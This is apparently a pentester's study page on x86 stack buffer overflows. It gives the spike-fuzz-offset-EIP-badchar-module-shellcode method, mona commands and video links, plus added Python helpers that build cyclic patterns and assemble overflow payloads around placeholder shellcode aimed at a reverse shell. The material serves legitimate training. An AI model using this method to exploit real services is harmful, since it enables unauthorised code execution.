A buffer overflow (BOF) occurs when more data is written into a buffer than it was allocated to hold. The excess spills into adjacent memory; on the stack that includes the saved return address, so an attacker who controls the overflowing data can redirect execution to code of their choosing, which is how a BOF turns into remote code execution (RCE).

🚰 Buffer Overflow

Corelan Team BOF Introduction

Visual Depiction

The buffer on the stack is overflowed, the saved return address is overwritten, and execution is redirected into the attacker's shellcode.

My Walkthroughs

{% content-ref url="overflow1.md" %} overflow1.md {% endcontent-ref %}

{% content-ref url="overflow2.md" %} overflow2.md {% endcontent-ref %}

{% content-ref url="overflow3.md" %} overflow3.md {% endcontent-ref %}

Attacking the stack

  • The goal: overflow the buffer → keep writing past it until the saved return address (EIP) is overwritten → control where execution resumes → land in our shellcode and spawn a reverse shell.
  • Remember, the buffer overflow methodology consists of several steps:
    1. Spiking
      1. Send malformed input to each command or function the program exposes and watch which one crashes it; that is the vulnerable entry point.
    2. Fuzzing
      1. Send progressively longer strings (for example 100 bytes more each round) to that entry point until the program crashes, and note roughly how many bytes it took.
    3. Finding the offset
      1. Send a unique cyclic pattern of about that length. The four pattern bytes that land in EIP tell us exactly how many bytes sit before the return address; that number is the offset.
    4. Overwriting the EIP
      1. Confirm the offset by sending that many bytes of filler followed by four known bytes (e.g. "BBBB"); the debugger should show EIP = 0x42424242.
    5. Finding bad characters
      1. Send every byte 0x01-0xFF after the overwritten EIP and compare the stack dump with what was sent. Any byte that is dropped, altered, or truncates everything after it is a bad character and must be kept out of both the return address and the shellcode. 0x00 is almost always bad because it terminates C strings.
    6. Finding the correct module
      1. Look for a module (typically a DLL loaded by the program) that has no memory protections (no ASLR, DEP, SafeSEH or rebasing) and contains a JMP ESP instruction (opcode FF E4). Its address, written little-endian and free of bad characters, becomes the new EIP.
      2. Mona Modules + Immunity Debugger: `!mona modules` lists loaded modules with their protections, and `!mona jmp -r esp -m <module>` finds usable JMP ESP addresses in the chosen module.
    7. Generate shellcode that leads to RCE
      1. Generate a reverse-shell payload with the bad characters encoded out, add a short NOP sled after the return address so ESP lands safely, and send filler + JMP ESP address + NOPs + shellcode with a listener waiting for the callback.
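As an added example (not code from the original page or from the video series it links), the following Python helpers implement the offline parts of the steps above: generating the cyclic pattern used in step 3, turning the EIP value seen in the debugger into the offset, building the bad-character string for step 5 and spotting the first mangled byte in a stack dump, and assembling the step 7 payload with a check that no bad byte crept into the return address or the shellcode. The EIP value 0x386F4337, the JMP ESP address 0x625011AF, the INT3-only placeholder shellcode and the dump that drops 0x0A are constructed inputs, not results from any real target; sending the payloads over the network is left to the socket code the reader already uses for spiking and fuzzing.

```python
"""Offline helpers for the stack-overflow methodology (added example).

No target is contacted: every address, EIP value and memory dump below is
constructed for illustration.  Send the returned payloads with your own
socket code (e.g. s.send(payload)) during the live steps.
"""
import string
import struct
from typing import Optional


def cyclic_pattern(length: int) -> bytes:
    """Unique pattern in the Metasploit style (msf-pattern_create -l N):
    Aa0Aa1...Aa9Ab0... so any 4-byte window occurs only once."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern exhausted: maximum length is 20280 bytes")


def find_offset(pattern: bytes, eip: int) -> int:
    """Number of bytes before the saved return address.

    `eip` is the value as the debugger displays it (e.g. 0x386F4337).
    x86 is little-endian, so the bytes that sit in memory are the reverse
    of that display; pack accordingly before searching the pattern."""
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not in pattern: wrong crash or pattern too short")
    return idx


def badchar_string(exclude: bytes = b"\x00") -> bytes:
    """Every byte 0x01..0xFF minus the ones already known to be bad.
    0x00 is never sent: it terminates C strings and truncates the payload."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_bad_char(sent: bytes, dumped: bytes) -> Optional[int]:
    """Compare the bytes sent with the stack dump read back in the debugger.

    The first position where they diverge, or where the dump ends early,
    is a bad character.  Everything after it is unreliable, so add it to
    the exclude list and repeat until the dump matches what was sent."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def build_payload(offset: int, jmp_esp: int, shellcode: bytes,
                  bad: bytes = b"\x00", nops: int = 16,
                  prefix: bytes = b"") -> bytes:
    """prefix + filler up to EIP + JMP ESP address + NOP sled + shellcode.

    The return address is packed little-endian.  The NOP sled gives ESP
    some slack so execution slides into the shellcode even if the first
    few bytes after the return address get clobbered.  Refuses to build if
    a bad byte appears in the address or the shellcode."""
    ret = struct.pack("<I", jmp_esp)
    for name, blob in (("JMP ESP address", ret), ("shellcode", shellcode)):
        hits = sorted({b for b in blob if b in bad})
        if hits:
            raise ValueError(f"{name} contains bad chars: {[hex(h) for h in hits]}")
    return prefix + b"A" * offset + ret + b"\x90" * nops + shellcode


if __name__ == "__main__":
    pat = cyclic_pattern(3000)
    offset = find_offset(pat, 0x386F4337)          # constructed EIP value
    print("offset:", offset)
    eip_check = b"A" * offset + b"BBBB"            # step 4: expect EIP 0x42424242
    print("EIP check payload length:", len(eip_check))
    sent = badchar_string()
    dumped = sent.replace(b"\x0a", b"")            # constructed dump: target ate 0x0A
    print("first bad char:", hex(first_bad_char(sent, dumped)))
    # 0x625011AF and the INT3-only shellcode are placeholders, not real values
    payload = build_payload(offset, 0x625011AF, b"\xcc" * 32, bad=b"\x00\x0a")
    print("payload bytes:", len(payload), "EIP ->", payload[offset:offset + 4].hex())
```

The bad-character loop is deliberately iterative: because a bad byte corrupts or truncates everything that follows it, `first_bad_char` only reports the first one, and the string has to be re-sent with that byte excluded until the dump and the sent bytes match end to end.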

Buffer Overflow Methodology Example

Step-By-Step Example

Spiking:

https://www.youtube.com/watch?v=3x2KT4cRP9o&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=2

Fuzzing:

https://www.youtube.com/watch?v=FCIfWTAtPr0&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=3

Finding the Offset:

https://www.youtube.com/watch?v=GqwyonqLYdQ&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=4

Overwriting the EIP:

https://www.youtube.com/watch?v=Wh9wRKBzajo&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=5

Finding Bad Characters:

https://www.youtube.com/watch?v=uIFYNVqpZ0k&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=6

Finding the Right Module:

https://www.youtube.com/watch?v=k9D9RuFT02I&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=7

Generating Shellcode and Gaining RCE:

https://www.youtube.com/watch?v=qSjxR8tfokg&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=8

Additional Resources for Buffer Overflows:

TryHackMe | Buffer Overflow Prep

TryHackMe | Brainpan 1

Windows Binaries

The following binaries are vulnerable to BOFs:

Linux Binaries

The following binaries are vulnerable to BOFs: